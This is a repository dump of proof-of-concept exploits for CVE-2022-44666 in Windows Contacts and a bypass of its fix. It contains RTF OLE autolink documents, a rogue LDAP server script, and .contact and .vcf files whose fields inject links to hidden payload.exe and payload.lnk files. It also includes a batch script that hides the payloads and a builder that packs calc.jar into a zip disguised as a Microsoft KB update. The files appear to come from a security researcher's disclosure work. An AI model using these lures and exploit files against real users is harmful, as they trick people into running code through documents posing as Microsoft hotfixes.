00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 
000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 
00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 687474703a2f2f3132372e302e302e313a383038312f706f632e68746d6c0000bbbbcccc200068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /bypass/diagcab-pocs/MSWord/url-protocol-ldap/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 127 | 128 | 129 | 
-------------------------------------------------------------------------------- /bypass/diagcab-pocs/cert.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/diagcab-pocs/cert.cer -------------------------------------------------------------------------------- /bypass/diagcab-pocs/ldap-rogue-server/ldap-server.py: -------------------------------------------------------------------------------- 1 | # LDAP Rogue Server. Sample taken from https://ldaptor.readthedocs.io/en/latest/quickstart.html#ldap-server-quick-start 2 | # Fully tested with Python 2.7. To run, install the package from pip: pip install ldaptor. 3 | # URL protocol example => ldap://127.0.0.1:389/cn=Microsoft,ou=people,dc=example,dc=org 4 | 5 | import sys 6 | import io 7 | 8 | from twisted.application import service 9 | from twisted.internet.endpoints import serverFromString 10 | from twisted.internet.protocol import ServerFactory 11 | from twisted.python.components import registerAdapter 12 | from twisted.python import log 13 | from ldaptor.inmemory import fromLDIFFile 14 | from ldaptor.interfaces import IConnectedLDAPEntry 15 | from ldaptor.protocols.ldap.ldapserver import LDAPServer 16 | 17 | LDIF = b"""\ 18 | dn: dc=org 19 | dc: org 20 | objectClass: dcObject 21 | 22 | dn: dc=example,dc=org 23 | dc: example 24 | objectClass: dcObject 25 | objectClass: organization 26 | 27 | dn: ou=people,dc=example,dc=org 28 | objectClass: organizationalUnit 29 | ou: people 30 | 31 | dn: cn=Microsoft,ou=people,dc=example,dc=org 32 | cn: Microsoft 33 | gn: Microsoft 34 | company: Microsoft 35 | title: Microsoft KB5001337-hotfix 36 | mail:">Run-installer 37 | url:">Run-installer 38 | wwwhomepage:">Run-installer 39 | objectclass: top 40 | objectclass: person 41 | objectClass: inetOrgPerson 42 | 43 | """ 44 | 45 | 46 | class Tree: 47 | def __init__(self): 48 | global LDIF 49 | 
self.f = io.BytesIO(LDIF) 50 | d = fromLDIFFile(self.f) 51 | d.addCallback(self.ldifRead) 52 | 53 | def ldifRead(self, result): 54 | self.f.close() 55 | self.db = result 56 | 57 | 58 | class LDAPServerFactory(ServerFactory): 59 | protocol = LDAPServer 60 | 61 | def __init__(self, root): 62 | self.root = root 63 | 64 | def buildProtocol(self, addr): 65 | proto = self.protocol() 66 | proto.debug = self.debug 67 | proto.factory = self 68 | return proto 69 | 70 | 71 | if __name__ == "__main__": 72 | from twisted.internet import reactor 73 | 74 | if len(sys.argv) == 2: 75 | port = int(sys.argv[1]) 76 | else: 77 | port = 389 78 | # First of all, to show logging info in stdout : 79 | log.startLogging(sys.stderr) 80 | # We initialize our tree 81 | tree = Tree() 82 | # When the LDAP Server protocol wants to manipulate the DIT, it invokes 83 | # `root = interfaces.IConnectedLDAPEntry(self.factory)` to get the root 84 | # of the DIT. The factory that creates the protocol must therefore 85 | # be adapted to the IConnectedLDAPEntry interface. 
86 | registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry) 87 | factory = LDAPServerFactory(tree.db) 88 | factory.debug = True 89 | application = service.Application("ldaptor-server") 90 | myService = service.IServiceCollection(application) 91 | serverEndpointStr = "tcp:{0}".format(port) 92 | e = serverFromString(reactor, serverEndpointStr) 93 | d = e.listen(factory) 94 | reactor.run() 95 | -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/hidden/@payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/further-pocs/MSWord/hidden/@payload.exe -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/hidden/@payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/further-pocs/MSWord/hidden/@payload.lnk -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/hidden/payload.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/further-pocs/MSWord/hidden/payload.bin -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/setup-hidden.bat: -------------------------------------------------------------------------------- 1 | attrib +s +h +r hidden\payload.bin 2 | attrib +s +h +r hidden\@payload.exe 3 | attrib +s +h +r hidden\@payload.lnk 4 | attrib +s +h +r hidden -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/url-protocol-ldap/exploit.docx: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/further-pocs/MSWord/url-protocol-ldap/exploit.docx -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/url-protocol-ldap/exploit.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | 
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 15 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400 16 | 72007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e500 17 | 000000000000000000000040e84f40667fd80103000000c00200000000000001004f006c006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000 18 | 00000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000800100000000000003004f 19 | 0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff00000000 20 | 
000000000000000000000000000000000000000000000000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f0000000000000000000000000000000000000000 21 | 00000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000700 22 | 000040010000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 23 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 24 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 25 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 26 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 27 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 28 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000020000c0000 29 | 005f3137313534393137353500000000009d0000000903000000000000c00000000000004602000000e0c9ea79f9bace118c8200aa004ba90b5600000068007400740070003a002f002f003100320037002e0030002e0030002e0031003a0038003000380031002f0070006f0063002e00680074006d006c000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c00000 30 | 
00000000460200000020000100000000ffffffff0000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002300 31 | 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} 32 | {\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324}}}}} 33 | -------------------------------------------------------------------------------- /bypass/further-pocs/MSWord/url-protocol-ldap/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /bypass/further-pocs/ldap-rogue-server/ldap-server.py: -------------------------------------------------------------------------------- 1 | # LDAP Rogue Server. Sample taken from https://ldaptor.readthedocs.io/en/latest/quickstart.html#ldap-server-quick-start 2 | # Fully tested with Python 2.7. To run, install the package from pip: pip install ldaptor. 
3 | # URL protocol example => ldap://127.0.0.1:389/cn=Microsoft,ou=people,dc=example,dc=org 4 | 5 | import sys 6 | import io 7 | 8 | from twisted.application import service 9 | from twisted.internet.endpoints import serverFromString 10 | from twisted.internet.protocol import ServerFactory 11 | from twisted.python.components import registerAdapter 12 | from twisted.python import log 13 | from ldaptor.inmemory import fromLDIFFile 14 | from ldaptor.interfaces import IConnectedLDAPEntry 15 | from ldaptor.protocols.ldap.ldapserver import LDAPServer 16 | 17 | LDIF = b"""\ 18 | dn: dc=org 19 | dc: org 20 | objectClass: dcObject 21 | 22 | dn: dc=example,dc=org 23 | dc: example 24 | objectClass: dcObject 25 | objectClass: organization 26 | 27 | dn: ou=people,dc=example,dc=org 28 | objectClass: organizationalUnit 29 | ou: people 30 | 31 | dn: cn=Microsoft,ou=people,dc=example,dc=org 32 | cn: Microsoft 33 | gn: Microsoft 34 | company: Microsoft 35 | title: Microsoft KB5001337-hotfix 36 | mail:">Run-installer 37 | url:">Run-installer 38 | wwwhomepage:">Run-installer 39 | objectclass: top 40 | objectclass: person 41 | objectClass: inetOrgPerson 42 | 43 | """ 44 | 45 | 46 | class Tree: 47 | def __init__(self): 48 | global LDIF 49 | self.f = io.BytesIO(LDIF) 50 | d = fromLDIFFile(self.f) 51 | d.addCallback(self.ldifRead) 52 | 53 | def ldifRead(self, result): 54 | self.f.close() 55 | self.db = result 56 | 57 | 58 | class LDAPServerFactory(ServerFactory): 59 | protocol = LDAPServer 60 | 61 | def __init__(self, root): 62 | self.root = root 63 | 64 | def buildProtocol(self, addr): 65 | proto = self.protocol() 66 | proto.debug = self.debug 67 | proto.factory = self 68 | return proto 69 | 70 | 71 | if __name__ == "__main__": 72 | from twisted.internet import reactor 73 | 74 | if len(sys.argv) == 2: 75 | port = int(sys.argv[1]) 76 | else: 77 | port = 389 78 | # First of all, to show logging info in stdout : 79 | log.startLogging(sys.stderr) 80 | # We initialize our tree 81 | tree = 
Tree() 82 | # When the LDAP Server protocol wants to manipulate the DIT, it invokes 83 | # `root = interfaces.IConnectedLDAPEntry(self.factory)` to get the root 84 | # of the DIT. The factory that creates the protocol must therefore 85 | # be adapted to the IConnectedLDAPEntry interface. 86 | registerAdapter(lambda x: x.root, LDAPServerFactory, IConnectedLDAPEntry) 87 | factory = LDAPServerFactory(tree.db) 88 | factory.debug = True 89 | application = service.Application("ldaptor-server") 90 | myService = service.IServiceCollection(application) 91 | serverEndpointStr = "tcp:{0}".format(port) 92 | e = serverFromString(reactor, serverEndpointStr) 93 | d = e.listen(factory) 94 | reactor.run() -------------------------------------------------------------------------------- /bypass/images/msrc-reply-case-closed.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/images/msrc-reply-case-closed.png -------------------------------------------------------------------------------- /bypass/images/partialmatches-diaphora-wab32dll.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/images/partialmatches-diaphora-wab32dll.png -------------------------------------------------------------------------------- /bypass/images/show-messagebox-wabexe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/images/show-messagebox-wabexe.png -------------------------------------------------------------------------------- /bypass/images/unmatched-diaphora-wab32dll.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/images/unmatched-diaphora-wab32dll.png -------------------------------------------------------------------------------- /bypass/jar-poc/KB-3133722062023.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/jar-poc/KB-3133722062023.zip -------------------------------------------------------------------------------- /bypass/jar-poc/create-poc.py: -------------------------------------------------------------------------------- 1 | import os, random, shutil 2 | 3 | print("[+] Building junk files.") 4 | if not os.path.isdir("template"): 5 | os.mkdir("template") 6 | if not os.path.isdir("template/setup"): 7 | os.mkdir("template/setup") 8 | template_path = "" 9 | choice1 = random.randrange(10) 10 | for i in range(10): 11 | if not os.path.isdir("template/setup/kb-part." + str(i)): 12 | os.mkdir("template/setup/kb-part." + str(i)) 13 | choice2 = random.randrange(20) 14 | for j in range(20): 15 | if not os.path.isdir("template/setup/kb-part." + str(i) + "/kb-part" + str(j)): 16 | os.mkdir("template/setup/kb-part." + str(i) + "/kb-part" + str(j)) 17 | choice3 = random.randrange(20) 18 | for z in range(20): 19 | if i == choice1 and j == choice2 and z == choice3: 20 | shutil.copyfile("payload/calc.jar", "template/setup/kb-part." + str(i) + "/kb-part" + str(j) + "/KB@3133722062023$part" + str(z) + ".jar") 21 | template_path = "setup\\kb-part." + str(i) + "\\kb-part" + str(j) + "\\KB@3133722062023$part" + str(z) + ".jar" 22 | else: 23 | f = open("template/setup/kb-part." 
+ str(i) + "/kb-part" + str(j) + "/" + random.choice(["x41", "", "x5c"]) + "KB@3133722062023$part" + str(z) + random.choice([".jar", ".dat", ""]), "w") 24 | f.write("chunk") 25 | f.close() 26 | 27 | print("[+] Update file installer.contact.") 28 | f = open("template.contact", "r") 29 | contact = f.read() 30 | f.close() 31 | f = open("template/installer.contact", "w") 32 | print("[+] Payload path is: %s" % template_path) 33 | installer = contact.replace("payload-path", template_path) 34 | f.write(installer) 35 | f.close() 36 | print("[+] Zipping.") 37 | shutil.make_archive('KB-3133722062023','zip','template') 38 | print("[+] Done.") 39 | -------------------------------------------------------------------------------- /bypass/jar-poc/payload/calc.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/jar-poc/payload/calc.jar -------------------------------------------------------------------------------- /bypass/report-pocs/bypass.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="hidden\@payload.lnk">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | j00sean 23 | j00sean 24 | j00sean 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a 
href="hidden\@payload.exe">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">CLICKMEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE</a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Security researcher 66 | 0day Factory 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /bypass/report-pocs/hidden/@payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/report-pocs/hidden/@payload.exe -------------------------------------------------------------------------------- /bypass/report-pocs/hidden/@payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/report-pocs/hidden/@payload.lnk -------------------------------------------------------------------------------- /bypass/report-pocs/hidden/payload.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/report-pocs/hidden/payload.bin -------------------------------------------------------------------------------- /bypass/videos/install-certificate.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/install-certificate.gif -------------------------------------------------------------------------------- /bypass/videos/jar-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/jar-exploit.gif -------------------------------------------------------------------------------- /bypass/videos/ldap-msword-diagcab-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/ldap-msword-diagcab-exploit.gif -------------------------------------------------------------------------------- /bypass/videos/ldap-msword-exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/ldap-msword-exploit.gif -------------------------------------------------------------------------------- /bypass/videos/simple-payload.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/bypass/videos/simple-payload.gif -------------------------------------------------------------------------------- /further-pocs/MSWord/hidden/payload.bin: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/hidden/payload.bin -------------------------------------------------------------------------------- /further-pocs/MSWord/hidden/payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/hidden/payload.exe -------------------------------------------------------------------------------- /further-pocs/MSWord/hidden/payload.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/hidden/payload.lnk -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/KB5014666-hotfix.contact: -------------------------------------------------------------------------------- 1 | 2 | 3 | 2022-07-25T09:36:02Z 4 | 5 | 6 | 7 | 4b736c6d-6b7e-40bf-8283-6dbd3ff7625e 8 | 9 | 10 | 11 | 12 | SMTP 13 | "></a><a href="notepad">Run-installer </a> 14 | 15 | Preferred 16 | 17 | 18 | 19 | 20 | 21 | 22 | Microsoft KB5014666-hotfix 23 | Microsoft 24 | Microsoft 25 | 26 | 27 | 28 | 29 | 000-000-0000 30 | 31 | Voice 32 | Business 33 | 34 | 35 | 36 | 000-000-0000 37 | 38 | Cellular 39 | 40 | 41 | 42 | 000-000-0000 43 | 44 | Voice 45 | Personal 46 | 47 | 48 | 49 | 50 | 51 | "></a><a href="calc">Run-installer </a> 52 | 53 | Business 54 | 55 | 56 | 57 | "></a><a href="notepad">Run-installer </a> 58 | 59 | Personal 60 | 61 | 62 | 63 | 64 | 65 | Microsoft Hotfix 66 | Microsoft Corporation 67 | 68 | Business 69 | 70 | 71 | 72 | 73 | 74 | 75 | UserTile 76 | 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- 
/further-pocs/MSWord/poc/KB5014666-hotfix.vcf: -------------------------------------------------------------------------------- 1 | BEGIN:VCARD 2 | VERSION:2.1 3 | N;LANGUAGE=en-us:Microsoft 4 | FN:Microsoft 5 | NICKNAME: Microsoft KB5014666-hotfix 6 | ORG:Microsoft Corporation 7 | TITLE:Microsoft Hotfix 8 | TEL;WORK;VOICE:000-000-0000 9 | TEL;HOME;VOICE:000-000-0000 10 | TEL;CELL;VOICE:000-000-0000 11 | EMAIL;PREF;INTERNET:">Run-installer 12 | URL;WORK:">Run-installer 13 | URL;TYPE=HOME:">Run-installer 14 | END:VCARD -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/poc.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/j00sean/CVE-2022-44666/a236763e84bb1105e90daa97130caed61370db8d/further-pocs/MSWord/poc/poc.docx -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/poc.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 128 | 129 | -------------------------------------------------------------------------------- /further-pocs/MSWord/poc/poc.rtf: -------------------------------------------------------------------------------- 1 | {\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0{ 2 | {\object\objautlink\rsltpict\objw1440\objh1439{\*\objclass http://127.0.0.1:8081/poc.html}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 0105000002000000090000004f4c45324c696e6b 3 | 000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000 4 | feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 5 
| ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 6 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 7 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 8 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 9 | fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffff 10 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 11 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 12 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 13 | ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff 14 | 